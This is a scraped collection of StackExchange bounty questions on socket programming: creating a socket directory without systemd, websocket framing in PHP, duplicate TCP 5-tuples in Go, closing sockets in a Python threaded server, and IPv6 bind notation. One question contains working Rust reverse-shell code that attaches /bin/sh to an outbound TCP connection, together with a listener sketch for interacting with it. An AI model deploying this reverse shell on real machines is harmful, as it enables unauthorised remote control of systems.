#StackBounty: #systemd #sockets Generate a dir for unix sockets WITHOUT systemd

Bounty: 50

On a normal Ubuntu install I used to create a dir for Unix sockets as follows (say, for a project foo):

  1. Create a systemd-tmpfiles configuration file: /usr/lib/tmpfiles.d/foo.conf
  2. Place the following line in the file:
    d /run/foo 0770 <username> <groupname> -
    

Then on the next reboot the dir /run/foo is created with the required permissions. The reason I do this is that only root can write to /var/run (which is a symlink to /run), and it's common for apps to drop privileges and switch user before creating their socket, at which point they can no longer write to /var/run.

Now I am using WSL2 with Ubuntu 20.04, and systemd is not available. One can jump through many hoops to get it working, but those workarounds are buggy.

How does one create a directory with the desired permissions, recreated fresh on every reboot, before any of the installed apps (e.g. nginx or PostgreSQL) attempt to create their sockets, so that they don't fail because of stale sockets left over from before the reboot?
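
Purely as an illustration of what such a boot-time step could look like without systemd, assuming you can arrange for a command to run as root when the distro starts; the path, user, and group names below are hypothetical placeholders:

#!/usr/bin/env python3
"""Recreate a socket directory with the desired ownership at startup.

Illustrative sketch only: assumes it runs as root before nginx/postgresql
start. SOCKET_DIR, OWNER and GROUP are placeholders.
"""
import grp
import os
import pwd
import shutil

SOCKET_DIR = "/run/foo"
OWNER = "someuser"
GROUP = "somegroup"

# Clear anything left from the previous boot, stale sockets included.
shutil.rmtree(SOCKET_DIR, ignore_errors=True)

# Recreate the directory and hand it to the unprivileged user/group.
os.makedirs(SOCKET_DIR, exist_ok=True)
os.chown(SOCKET_DIR, pwd.getpwnam(OWNER).pw_uid, grp.getgrnam(GROUP).gr_gid)
os.chmod(SOCKET_DIR, 0o770)  # set the mode explicitly; makedirs is subject to umask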


Get this bounty!!!

#StackBounty: #sockets #tcp #rust #netcat #reverse-shell How to interact with a reverse shell in Rust?

Bounty: 50

OpenBSD’s Netcat implementation listens on a port with unix_bind()… basically the same behavior as Rust’s TcpListener::bind(). Where I got lost in writing my listen function (emulating nc -l -p <port>) is how to interact with reverse shells.

As trivial as it sounds, I want listen to give me the sh-3.2$ prompt, just like nc -l -p <port> does. None of the Netcat-in-Rust implementations I dug up online let me interact with a reverse shell like that.

Reverse shell code (Machine 1): (adapted from this question I asked years ago)

use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

fn reverse_shell(ip: &str, port: u16) {
    // Connect back to the listener and wire the shell's stdio to the socket.
    let s = TcpStream::connect((ip, port)).unwrap();
    let fd = s.as_raw_fd();
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn().unwrap().wait().unwrap();
}

Listening code (Machine 2):

fn listen(port: u16) {
   let x = std::net::TcpListener::bind(("0.0.0.0", port)).unwrap();
   let (mut stream, _) = x.accept().unwrap();
   // How do I interact with the shell now??
}

There’s a certain simplicity and elegance to Rust code that helps me understand succinctly what’s going on, which is why I don’t want to just copy the C code from Netcat.
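
For reference, the interaction pattern itself is language-agnostic: relay whatever is typed on the listener's stdin to the accepted socket, and relay bytes arriving from the socket to stdout, concurrently, so the remote shell's prompt shows up locally. A rough sketch of that pattern, written in Python purely to illustrate the idea (it is not a Rust answer and not taken from any of the implementations mentioned above):

import socket
import sys
import threading

def listen(port):
    # Accept one connection, then relay: local stdin -> socket, socket -> stdout.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    conn, _addr = srv.accept()

    def pump_stdin():
        # Forward everything typed locally to the remote shell.
        for line in sys.stdin:
            conn.sendall(line.encode())

    threading.Thread(target=pump_stdin, daemon=True).start()

    # Print everything the remote shell sends, including its prompt.
    while True:
        data = conn.recv(4096)
        if not data:
            break
        sys.stdout.write(data.decode(errors="replace"))
        sys.stdout.flush()

if __name__ == "__main__":
    listen(int(sys.argv[1]))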


Get this bounty!!!

#StackBounty: #php #sockets #websocket PHP websocket using socket_recv() – will I ever receive a partial frame?

Bounty: 100

I am writing a websocket server in PHP (using the sockets extension) and I need a bit of help understanding to what extent I need to deal with fragmented messages.

My understanding of how websocket information is passed is as follows:

  1. Client application sends a MESSAGE (of arbitrary length) to the client-side API.
  2. Client-side API splits the MESSAGE into one or more FRAMES (also of arbitrary length) and sends them to the network layer.
  3. The network layer splits the data into a number of PACKETS to be sent over the network via TCP.
  4. The server receives the TCP PACKETS (possibly out-of-order, but it re-orders them if necessary) and delivers them to the application that is listening on the relevant port.
  5. The application calls socket_recv() to read the received data from the socket.

The thing I want to understand is: what data will my application see when reading a stream of websocket data using socket_recv()?

Specifically, to what extent do I need to worry about the fragmentation?


To help explain my question, here is the above process in diagrammatic form:

1. Web app  (messages):   [Message_1][Message_2]
2. Browser  (frames)  :   [Messag][e_1][Messag][e_2]
3. TCP send (packets) :   [Mess][ag][e_1][Mess][ag][e_2]
4. TCP recv (packets) :   [ag][Mess][e_2][ag][Mess][e_1]
5. socket_recv        :   ???

If I call socket_recv() in a loop, until it returns a length of zero (adding to my internal buffer each time), am I guaranteed to get a single, complete MESSAGE?

socket_recv: [Message_1]
socket_recv: [Message_2]

Or a single complete FRAME?

socket_recv: [Messag]
socket_recv: [e_1]
socket_recv: [Messag]
socket_recv: [e_2]

Or, will it actually be an arbitrary series of PACKETS representing whatever data has been received so far (which may therefore be a partial FRAME or even multiple FRAMES)?

socket_recv: [Messag
socket_recv: e_1][Mess
socket_recv:
socket_recv: ag
socket_recv: e_2]

Or something else?

I am quite happy stitching together the various FRAMES of data, but it would make things a lot easier if I could assume that the first bytes of received data in each poll (triggered via socket_select()) are always a FRAME header, rather than having to treat the input as a raw byte stream that must be stitched back into FRAMES before parsing can begin.
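
For comparison, here is a minimal sketch of the defensive approach, written in Python rather than PHP purely for illustration: treat each recv() as an arbitrary chunk of bytes, append it to a buffer, and only peel off a frame once the buffer holds a complete one. The frame parser below is a toy that ignores masking and extended payload lengths.

import socket

def recv_frames(conn: socket.socket):
    """Yield complete frames, treating recv() as an arbitrary byte stream."""
    buf = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:                 # peer closed the connection
            return
        buf += chunk
        while True:
            frame, buf = try_parse_frame(buf)
            if frame is None:         # header or payload still incomplete
                break
            yield frame

def try_parse_frame(buf: bytes):
    """Toy parser: 2-byte header, unmasked, payload length < 126."""
    if len(buf) < 2:
        return None, buf
    payload_len = buf[1] & 0x7F
    end = 2 + payload_len
    if len(buf) < end:
        return None, buf
    return buf[:end], buf[end:]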


Get this bounty!!!

#StackBounty: #linux #sockets #go #tcp Why were two sockets with the same 5-tuple accepted during concurrent connects to the server?

Bounty: 50

server.go

package main

import (
    "fmt"
    "io"
    "io/ioutil"
    "log"
    "net"
    "net/http"
    _ "net/http/pprof"
    "sync"
    "syscall"
)

type ConnSet struct {
    data  map[int]net.Conn
    mutex sync.Mutex
}

func (m *ConnSet) Update(id int, conn net.Conn) error {
    m.mutex.Lock()
    defer m.mutex.Unlock()
    if _, ok := m.data[id]; ok {
        fmt.Printf("add: key %d existed n", id)
        return fmt.Errorf("add: key %d existed n", id)
    }
    m.data[id] = conn
    return nil
}

var connSet = &ConnSet{
    data: make(map[int]net.Conn),
}

func main() {
    setLimit()

    ln, err := net.Listen("tcp", ":12345")
    if err != nil {
        panic(err)
    }

    go func() {
        if err := http.ListenAndServe(":6060", nil); err != nil {
            log.Fatalf("pprof failed: %v", err)
        }
    }()

    var connections []net.Conn
    defer func() {
        for _, conn := range connections {
            conn.Close()
        }
    }()

    for {
        conn, e := ln.Accept()
        if e != nil {
            if ne, ok := e.(net.Error); ok && ne.Temporary() {
                log.Printf("accept temp err: %v", ne)
                continue
            }

            log.Printf("accept err: %v", e)
            return
        }
        port := conn.RemoteAddr().(*net.TCPAddr).Port
        connSet.Update(port, conn)
        go handleConn(conn)
        connections = append(connections, conn)
        if len(connections)%100 == 0 {
            log.Printf("total number of connections: %v", len(connections))
        }
    }
}

func handleConn(conn net.Conn) {
    io.Copy(ioutil.Discard, conn)
}

func setLimit() {
    var rLimit syscall.Rlimit
    if err := syscall.Getrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }
    rLimit.Cur = rLimit.Max
    if err := syscall.Setrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }

    log.Printf("set cur limit: %d", rLimit.Cur)
}

client.go

package main

import (
    "bytes"
    "flag"
    "fmt"
    "io"
    "log"
    "net"
    "os"
    "strconv"
    "sync"
    "syscall"
    "time"
)

var portFlag = flag.Int("port", 12345, "port")

type ConnSet struct {
    data  map[int]net.Conn
    mutex sync.Mutex
}

func (m *ConnSet) Update(id int, conn net.Conn) error {
    m.mutex.Lock()
    defer m.mutex.Unlock()
    if _, ok := m.data[id]; ok {
        fmt.Printf("add: key %d existed n", id)
        return fmt.Errorf("add: key %d existed n", id)
    }
    m.data[id] = conn
    return nil
}

var connSet = &ConnSet{
    data: make(map[int]net.Conn),
}

func echoClient() {
    addr := fmt.Sprintf("127.0.0.1:%d", *portFlag)
    dialer := net.Dialer{}
    conn, err := dialer.Dial("tcp", addr)
    if err != nil {
        fmt.Println("ERROR", err)
        os.Exit(1)
    }
    port := conn.LocalAddr().(*net.TCPAddr).Port
    connSet.Update(port, conn)
    defer conn.Close()

    for i := 0; i < 10; i++ {
        s := fmt.Sprintf("%s", strconv.Itoa(i))
        _, err := conn.Write([]byte(s))
        if err != nil {
            log.Println("write error: ", err)
        }
        b := make([]byte, 1024)
        _, err = conn.Read(b)
        switch err {
        case nil:
            if string(bytes.Trim(b, "\x00")) != s {
                log.Printf("resp req not equal, req: %d, res: %s", i, string(bytes.Trim(b, "\x00")))
            }
        case io.EOF:
            fmt.Println("eof")
            break
        default:
            fmt.Println("ERROR", err)
            break
        }
    }
    time.Sleep(time.Hour)
    if err := conn.Close(); err != nil {
        log.Printf("client conn close err: %s", err)
    }
}

func main() {
    flag.Parse()
    setLimit()
    before := time.Now()
    var wg sync.WaitGroup
    for i := 0; i < 20000; i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            echoClient()
        }()
    }
    wg.Wait()
    fmt.Println(time.Now().Sub(before))
}

func setLimit() {
    var rLimit syscall.Rlimit
    if err := syscall.Getrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }
    rLimit.Cur = rLimit.Max
    if err := syscall.Setrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }

    log.Printf("set cur limit: %d", rLimit.Cur)
}

running command

go run server.go
---
go run client.go

Server running screenshot (image omitted).

The client initiates 20,000 connections to the server simultaneously, and the server accepted two connections whose remote ports are exactly the same (within an extremely short period of time).

I tried tracing the connections with tcpconnect.py from bcc (patched to also print skc_num) and with tcpaccept.py (trace output screenshots omitted). They likewise show that the remote port is duplicated on the server side while there is no duplicate on the client side.

In my understanding, a socket's 5-tuple cannot be duplicated, so why did the server accept two sockets with exactly the same remote port?

My test environment:

kernel version 5.3.15-300.fc31.x86_64 and 4.19.1

go version go1.13.5 linux/amd64


Get this bounty!!!

#StackBounty: #python #multithreading #sockets #python-multithreading Python closing socket and connection in a threaded server?

Bounty: 50

We have a Python socket threaded server example. It is a slightly modified version from
https://stackoverflow.com/a/23828265/2008247. The example works and my tests confirm that it performs better than the blocking server.

But in the example, the socket and the connection objects are not closed. Both objects have a close() method. (The close method on a connection is called only when an exception occurs; I would expect it to be called for every connection when it ends.) Don't we need to call them somewhere, and if so, how? (One possible approach is sketched after the example below.)

#!/usr/bin/env python

import socket
import threading

class ThreadedServer():

    def __init__(self, host, port):

        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))

    def listen(self):

        self.sock.listen(5)

        while True:

            con, address = self.sock.accept()
            con.settimeout(60)
            threading.Thread(target=self.listenToClient,
                             args=(con, address)).start()

    def listenToClient(self, con, address):

        while True:
            try:
                data = con.recv(1024)
                if data:
                    # Set the response to echo back the received data
                    response = data
                    con.send(response)
                else:
                    raise Exception('Client disconnected')
            except:
                con.close()
                return False


def main():

    ThreadedServer('', 8001).listen()


if __name__ == "__main__":
    main()
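
A minimal sketch of one way the close calls could be wired in, keeping the structure of the example above: wrap the per-client loop in try/finally so con.close() runs on a clean disconnect as well as on errors, and close the listening socket if the accept loop ever exits. This is only an illustration, not code from the linked answer; the two methods below would replace the corresponding methods in ThreadedServer.

    def listen(self):
        self.sock.listen(5)
        try:
            while True:
                con, address = self.sock.accept()
                con.settimeout(60)
                threading.Thread(target=self.listenToClient,
                                 args=(con, address)).start()
        finally:
            # Close the listening socket if the accept loop ever exits
            # (e.g. KeyboardInterrupt or a fatal accept() error).
            self.sock.close()

    def listenToClient(self, con, address):
        try:
            while True:
                data = con.recv(1024)
                if not data:
                    # An empty read means the client disconnected cleanly.
                    return
                con.send(data)  # echo the received data back
        except OSError:
            pass  # timeout or connection reset; fall through to close
        finally:
            con.close()  # always release the per-client socket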


Get this bounty!!!

#StackBounty: #linux #networking #ipv6 #sockets What is the difference between [::] and * in binding sockets to IPv6 addresses?

Bounty: 200

I’m trying to investigate listening IPv6 sockets on an Ubuntu Server. I don’t understand the difference between [::] and *.

Two questions on my mind:

  1. Is there any difference?
  2. If not, why do they appear in multiple representations?
$ ss --listening --tcp --ipv6

State       Recv-Q      Send-Q    Local Addr:Port    Peer Addr:Port                 
LISTEN      0           128            *:http             *:*
LISTEN      0           128            *:8083             *:*
LISTEN      0           128         [::]:ssh           [::]:*
LISTEN      0           128            *:19998            *:*
LISTEN      0           128            *:19999            *:*
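
One way to explore this yourself, sketched below as an experiment rather than an explanation of ss's column semantics: bind two test sockets to the IPv6 wildcard address, one with IPV6_V6ONLY enabled and one with it disabled, then run the same ss command and compare how each one is displayed. The port numbers are arbitrary.

import socket

def listen_v6(port, v6only):
    """Listen on the IPv6 wildcard address, optionally IPv6-only."""
    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # 1 = IPv6 traffic only; 0 = dual-stack (IPv4 clients show up as IPv4-mapped addresses)
    s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1 if v6only else 0)
    s.bind(("::", port))
    s.listen(5)
    return s

a = listen_v6(19001, v6only=True)
b = listen_v6(19002, v6only=False)
input("Now run: ss --listening --tcp --ipv6  (press Enter to quit)")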


Get this bounty!!!